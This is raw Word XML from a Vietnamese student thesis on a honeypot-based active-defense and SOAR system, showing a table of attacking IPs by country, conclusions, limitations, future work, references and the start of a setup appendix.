            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2044EB9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Quốc gia Nguồn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F0FF68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Số Lượng IP Độc Hại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="727047C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Tỷ lệ %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="587E1E0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Nhà Mạng / Đơn vị Chủ Quản (ISP Chính)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="09B07AAD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E6E20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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31DA721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Trung Quốc (CN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="245855D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142 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BE2FA3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34.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DA6F92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China Telecom, Alibaba Cloud, Tencent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="63D35718" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="525EF2E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F9A2AC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Hoa Kỳ (US)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7868662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86 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="582450D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20.6%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="043E446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DigitalOcean, Amazon Web Services, Linode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7AAD5CE2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DC1239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lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="357F129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Nga (RU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66F9610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48 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="080B530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11.5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="357C3FE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Hostkey, Rostelecom, Petersburg Internet Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="440E30AA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67D1389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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6076029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Hà Lan (NL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A4EBBC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32 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2987192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7.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EDD1F7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Serverius Holding, EUNetworks, Tor Exit Nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="41132D08" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F6DC8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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61AAAE1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Việt Nam (VN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BE6243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26 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7707323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6.2%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A1EF7B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Viettel, VNPT, FPT Telecom (Máy tính người dùng bị nhiễm botnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="537C3315" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17B3732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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A55AAE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Ấn Độ (IN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="238A7D4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21 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12F484A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5.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4990CFA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BSNL, Bharti Airtel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="4E5460BF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EC0838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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A83605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Brazil (BR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D12975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18 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D45640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4.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A1B8F4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Claro, Telefonica Brasil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="1C908753" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="161063F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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DD6E54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Khác</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="082593C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45 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24A316B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10.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FABCAD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bố rải rác trên hơn 25 quốc gia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FA434FF"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0991FD2C"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40AA2F11"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6: KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC6DD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6.1 Tổng kết Kết quả Nghiên cứu và Hiện thực hóa Đồ án</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F136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Sau quá trình nghiên cứu lý thuyết chuyên sâu, thiết kế kiến trúc hệ thống và lập trình thử nghiệm thực tế, đề tài 'Nghiên cứu, Thiết kế và Triển khai Hệ thống Phòng thủ Chủ động (Active Defense) kết hợp SSH Honeypot (Cowrie), Tự động hóa Phản ứng Sự cố (SOAR) và Trinh sát ngược Kẻ tấn công' đã hoàn thành xuất sắc toàn bộ các mục tiêu nghiên cứu đặt ra ban đầu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47E34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Hiện thực hóa thành công Kiến trúc Mini-SOC 5 phân lớp hoàn chỉnh, module hóa tối đa, kết hợp nhuần nhuyễn giữa bẫy cảm biến Cowrie và nền tảng điều phối phản ứng tự động SOAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E80A7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Phát triển thành công Động cơ Tương quan Sự kiện (Correlation Engine) với thuật toán Cửa sổ trượt thời gian, giúp loại bỏ triệt để hiện tượng bão cảnh báo (Alert Fatigue), tự động chuẩn hóa các hành vi xâm nhập sang ma trận TTPs chuẩn quốc tế MITRE ATT&amp;CK (T1110, T1078, T1082, T1105, T1552).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE65CF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Tích hợp năng lực Trinh sát ngược (Reverse Intelligence) tự động thu thập OSINT từ AbuseIPDB, Shodan API, GeoIP ASN và cơ chế quét cổng an toàn chỉ trong 1.8 giây, giúp lập hồ sơ đối thủ nhanh chóng và chính xác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7289FCA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4. Phát triển phân hệ Bẫy mồi Honeytoken và Khử ẩn danh (Active De-anonymization) giải quyết bài toán cốt lõi về hacker giấu mình sau VPN/Proxy, bắt được IP thật và User-Agent khi hacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tài liệu mồi về máy cá nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE42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Xây dựng Phân hệ Phân tích Mã độc tự động bóc tách mã băm SHA256, trích xuất IP C2 và tích hợp VirusTotal API phục vụ điều tra forensics tức thời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241912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6. Làm chủ cơ chế Tarpitting (Connection Tarpitting) giam lỏng và làm cạn kiệt tài nguyên của botnet, kết hợp chặn Tường lửa iptables động, giảm 99.8% thời gian phản ứng sự cố (từ 15-20 phút xuống còn 1.8-2.5 giây).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0869C9D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7. Triển khai Telegram SOAR Bot tương tác 2 chiều với bàn phím Inline Buttons, mang lại trải nghiệm điều hành tác chiến trực quan, hiện đại cho chuyên viên an ninh mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7082E2"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6.2 Khẳng định sự Vượt bậc so với Nhận xét Ban đầu của Giảng viên</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5"/>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5A9CE2EE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="405A1322" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>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rPr>
              <w:t>📌 ĐÁNH GIÁ SỰ CHUYỂN DỊCH GIÁ TRỊ KỸ THUẬT CỦA ĐỒ ÁN:</w:t>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:iCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lời khẳng định học thuật: Đề tài đã chuyển hóa triệt để từ một 'bài tập cài đặt phần mềm và gửi tin nhắn thông thường' (Application Configuration Level) thành một 'Công trình Nghiên cứu &amp; Kỹ thuật Kỹ sư Hệ thống Toàn diện' (Comprehensive Security Engineering Project). Sinh viên không chỉ áp dụng công cụ bề nổi mà đã tự tay thiết kế và lập trình hơn 1.200 dòng mã nguồn Python chuyên sâu, giải quyết các bài toán hóc búa về Tương quan dữ liệu, Trinh sát ngược, Khử ẩn danh đối thủ và Tự động hóa tác chiến.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FBAADA9" w14:textId="77777777" w:rsidR="003C5386" w:rsidRPr="005B486F" w:rsidRDefault="003C5386">
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A50722"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6.3 Những Hạn chế còn tồn tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F7BE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Mặc dù đạt được những kết quả rất tích cực, hệ thống vẫn còn một số điểm hạn chế cần tiếp tục hoàn thiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11B4A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Cảm biến bẫy hiện tại mới chỉ tập trung vào hai giao thức chính là SSH và Telnet. Các bề mặt tấn công ứng dụng Web (HTTP/HTTPS) và cơ sở dữ liệu (MySQL, Redis) chưa được tích hợp đồng bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CFD3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Việc phân tích mã độc hiện tại chủ yếu dựa trên phân tích tĩnh (Static Analysis &amp; Signature Matching). Chưa có môi trường Dynamic Sandbox cô lập bằng máy ảo (như Cuckoo Sandbox) để phân tích hành vi nạp DLL hoặc tiêm tiến trình thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589AA21C"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6.4 Hướng Phát triển Đề tài trong Tương lai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F49ED6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nâng cao hơn nữa sức mạnh tác chiến của hệ thống, hướng nghiên cứu tiếp theo sẽ tập trung vào các trọng tâm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122665F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Tích hợp Trí tuệ Nhân tạo &amp; Mô hình Ngôn ngữ Lớn (AI / LLM-powered Threat Hunting): Sử dụng các mô hình ngôn ngữ lớn (như Gemma, LLaMA) để tự động phân tích ngữ cảnh các câu lệnh bất thường mà hacker gõ trong terminal, tự động sinh kịch bản đối thoại đánh lừa (Dynamic Conversational Deception) để giữ chân hacker lâu hơn trong bẫy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66224F6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Mở rộng Hệ thống Mạng bẫy Phân tán (Distributed Honeynet Mesh): Triển khai các node cảm biến bẫy vệ tinh trên nhiều vùng địa lý (Multi-region Cloud: AWS, Google Cloud, Azure) và tập trung dữ liệu về một máy chủ SOC trung tâm qua Apache Kafka hoặc RabbitMQ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D15B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3. Tích hợp Dynamic Sandbox tự động: Tự động khởi chạy máy ảo tạm thời (Ephemeral QEMU/KVM VM) để kích hoạt mã độc và theo dõi luồng lưu lượng mạng xuất phát từ mã độc trong môi trường cô lập tuyệt đối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214795AE"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5245F985"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TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61823DD4"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 L. Spitzner, 'Honeypots: Tracking Hackers', Addison-Wesley Longman Publishing Co., Inc., Boston, MA, USA, 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8AD80A"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 xml:space="preserve">[2] M. Orebaugh and J. Pinkard, 'Cowrie SSH/Telnet Honeypot Documentation and Architecture', </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project, 2023. [Online]. Available: https://cowrie.readthedocs.io/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558ED24C"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[3] MITRE Corporation, 'MITRE ATT&amp;CK: Design and Philosophy', Technical Report, 2023. [Online]. Available: https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63267F34"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[4] MITRE Corporation, 'MITRE Engage: A Framework for Discussing and Planning Adversary Engagement Technologies and Operations', 2022. [Online]. Available: https://engage.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EAE6AD"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[5] MITRE Corporation, 'MITRE D3FEND: A Cybersecurity Countermeasure Knowledge Base', 2023. [Online]. Available: https://d3fend.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA04D33"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[6] Quốc hội nước CHXHCN Việt Nam, 'Bộ luật Hình sự số 100/2015/QH13 (Điều 287, Điều 289 về Tội phạm trong lĩnh vực CNTT và viễn thông)', NXB Chính trị Quốc gia Sự thật, Hà Nội, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE428A"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[7] Quốc hội nước CHXHCN Việt Nam, 'Luật An ninh mạng số 24/2018/QH14', NXB Chính trị Quốc gia Sự thật, Hà Nội, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0B9DFF"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[8] C. Stoll, 'The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage', Doubleday, New York, 1989.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB90ED7"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[9] Gartner Inc., 'Innovation Insight for Security Orchestration, Automation and Response (SOAR)', Gartner Research Report G00342371, 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B015B"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[10] P. Cichonski, T. Millar, T. Grance, and K. Scarfone, 'Computer Security Incident Handling Guide', NIST Special Publication 800-61 Revision 2, National Institute of Standards and Technology, 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EFE331"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[11] AbuseIPDB Project, 'AbuseIPDB API v2 Documentation: Reporting and Checking Malicious IP Addresses', 2024. [Online]. Available: https://www.abuseipdb.com/api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB8E30"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[12] J. Matherly, 'Complete Guide to Shodan: Collect More Data, Find More Devices, and More', Shodan LLC, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BABAE8"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[13] VirusTotal, 'VirusTotal v3 REST API Reference for Threat Intelligence and Malware Analysis', Google Chronicle, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA1063D"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[14] Thinkst Canary, 'Canarytokens: Quick, Free, Painless Breadcrumbs to Detect Network Intruders', 2023. [Online]. Available: https://canarytokens.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B790F3A"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[15] C. Kolias, G. Kambourakis, A. Stavrou, and J. Voas, 'DDoS in the IoT: Mirai and Other Botnets', IEEE Computer, vol. 50, no. 7, pp. 80-84, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E49FF55"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[16] N. Provos and T. Holz, 'Virtual Honeypots: From Botnet Tracking to Intrusion Detection', Addison-Wesley Professional, 2007.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D542DD"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[17] G. F. Lyon, 'Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning', Insecure.Com LLC, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B72C9BE"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[18] K. Scarfone and P. Hoffman, 'Guidelines for Implementing the Advanced Encryption Standard (AES) and Secure Shell (SSH) in Enterprise Environments', NIST SP 800-123, 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB22D02"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lastRenderedPageBreak/>
        <w:t>[19] Endlessh Project, 'Endlessh: An SSH Tarpit that slowly trickles an endless SSH banner', 2023. [Online]. Available: https://github.com/skeeto/endlessh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577554EE"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[20] Telegram FZ-LLC, 'Telegram Bot API Manual for Webhooks and Interactive Inline Keyboards', 2024. [Online]. Available: https://core.telegram.org/bots/api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4818EF"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27F166F0"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PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT VÀ VẬN HÀNH HỆ THỐNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306BE0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Phụ lục A: Hướng dẫn Triển khai Từng bước trên Máy chủ Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B61A1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1: Cài đặt các gói phụ thuộc và Cowrie Honeypot trên máy chủ Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af6"/>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6F2DF542" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9403" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
